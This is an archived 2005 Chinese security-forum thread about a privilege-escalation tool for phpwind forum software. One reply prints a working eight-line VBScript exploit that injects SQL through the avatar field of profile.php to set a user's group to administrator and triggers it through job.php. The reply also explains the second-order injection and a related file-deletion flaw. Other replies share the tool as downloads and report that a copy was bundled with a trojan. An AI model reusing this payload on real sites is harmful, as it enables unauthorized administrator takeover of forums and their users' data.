[原创]phpwind2.02andphpwind3.31ce提权工具目前行的php开发工具有
文章标题:[原创]phpwind2.02andphpwind3.31ce提权工具顶部 小沈 发布于:2005-08-1114:59  [楼主]
用户被禁言,该主题自动屏蔽!
附件:Fuckphpwind.rar(281K)下载次数:283
附件:Unit1.rar(2K)下载次数:193顶部 superhei 发布于:2005-08-1209:52  [1楼]
郁闷原理很简单吗?
开始我也这样说过555但是为了这个搞了我几天的时间555555顶部 bill 发布于:2005-08-1212:34  [2楼]
Quote:
下面是引用kevin1986于2005-08-1123:29发表的:
.漏洞原理很简单的,问题出在job.php和Profile.php
很早有文章就涉及这个漏洞,具体利用,一段VBS代码,8行搞定
热切期待简单原理分析+8行vbs代码!顶部 玄猫 发布于:2005-08-1212:37  [3楼]
原理说下,就是先修改头像为注入字符串,然后访问job.php这个页……
鱼可能写稿子了,大家等杂志吧顶部 kevin1986 发布于:2005-08-1216:46  [4楼]
对于上面我真的不想说什么...争论与否无非就是一份代码不代码的问题.而我的观念是,如果要共享,那么就完完全全的免费共享,别人来拿也好,自己共享出来也好,反正都是一回事.中间的心态问题我不会多去评论.我只关心技术上的讨论.
-----------------------------------------------SplTert-----------------------------
---------------------------codzstarthere-----------------------------------
setk=createobject("MSXML2.XMLHTTP")
thestr="proemail=themailof@you&proicon=0.gif%27%2Cgroupid%3D%273%7Ctest&step=2"
k.open"POST","www.****/phpwind/profile.php",false,false
k.setRequestHeader"Content-Length",Len(thestr)
k.setRequestHeader"CONTENT-TYPE","application/x-www-form-urlencoded"
k.send(thestr)
k.open"Get","www.****/phpwind/job.php?action=delimg"
k.send
msgbox"theninthlinewilltellutheprogramSendFinishedrightnowAndMoreiwan2C."&vbcrlf&"infactimnotinterestinginanythingwhaturtalkaboutexcepttechnology."&vbcrlf&"hommmm.everyone.ifuwannashare.pleaseshareitfreeinanyway."
----------------------------codzendhere------------------------------------
主要的代码一共是8行,最后一行我说了点什么,其实完完全全无关紧要.
关于这个漏洞,主要的原因是在于Job.php中产生的,但是操作的行为却在很大程度上迷惑了许多人,包括我在测试漏洞的时候都认为是Profile.php中的$Proicon变量引起的.
其实这个变量确实存在问题,而且可以直接导致一些恶意事件的发生.但是利用的两方面,一个是在Php中组合字符串,形成我们要说的漏洞,另外一个则是形成了删除任意文件的漏洞...
首先我们需要看看漏洞形成,在profile.php中的$proicon中,变量没有经过任何处理直接提交,系统中
的变量经过了PHP的GPC转义.到了MySQL中(一个XSS隐患).这是最重要的.
但是我们只是将数据写进了MySQL,而且其中受到了PHP的GPC转义,无法注射,这就
是很多对这个漏洞的错误认识.
其实漏洞真正的激发是在Job.php里的一个函数中,这个函数将数据从MySQL里读出,然后构造为辅助语句,这时候,转义已经被PHPWIND本身给过滤掉了,也就是说我们怎么提交的,在这个函数里从MySQL里出来的就是怎么样的.
那么我们只要组合一下字符串,然后就可以轻松的构造Inj语句,修改数据库,形成提升权限的漏洞了....
漏洞利用很简单,漏洞的原理也是很简单的.
只是我不希望在网络安全这个领域里,出现一些完全不属于技术上的东西......人各有各的想法,有的想法会和你的想法冲突,但是为什么要让别人出臭?.....做人要厚道顶部 冰血封情 发布于:2005-08-1223:53  [5楼]
攻击性言论已经删除最好的方法就是楼主把自己的源代码发出本来开源技术交流公开代码也是第一个部分大家继续讨论技术
代码已经上传大家可以直接参考评价顶部 sweet 发布于:2005-08-1412:17  [6楼]
可是华夏专门帖出告示,说你这个工具留有后门啊下面是原文:
甚用PHPWind利用工具正式版
经检测,已被放置后门,请各位甚用!!!!!!!!!!!
具体后门杀除方法:
新建文件:D:\WINNT\SYSTEM32\cpoiuyk.dll2005-8-1115:53:38
新建文件:D:\WINNT\SYSTEM32\Yqvfwrvr.d1l2005-8-1115:53:39
新建文件:D:\WINNT\SYSTEM32\Yqvfwrvr.dll2005-8-1115:53:39
不管你用什么工具,杀掉cpoiuyk.dllYqvfwrvr.dll在文件里的关联,然后删除顶部 玄猫 发布于:2005-08-1412:23  [7楼]
Quote:
下面是引用sweet于2005-08-1412:17发表的:
可是华夏专门帖出告示,说你这个工具留有后门啊下面是原文:
甚用PHPWind利用工具正式版
经检测,已被放置后门,请各位甚用!!!!!!!!!!!
具体后门杀除方法:
.......
他说的是我的工具,我的工具被人绑了马放在华夏。顶部 下雨天 发布于:2005-08-1414:43  [8楼]
[原创]phpwind2.02andphpwind3.31ce提权工具
软件作者:小沈qq:283218815
信息来源:邪恶八进制信息安全团队(www.eviloctal)
没什么好说的了,在核心版块看到你发的贴子啦。。。。。。。。。。。。。。
源代码在这里看到了,感谢分享。。。。。。顶部 又一天 发布于:2005-08-2023:18  [9楼]
这个东西早在6月份就出来了,并且是通杀,猫猫同志写的这个不针对所有版本(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:www.zipghost/

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。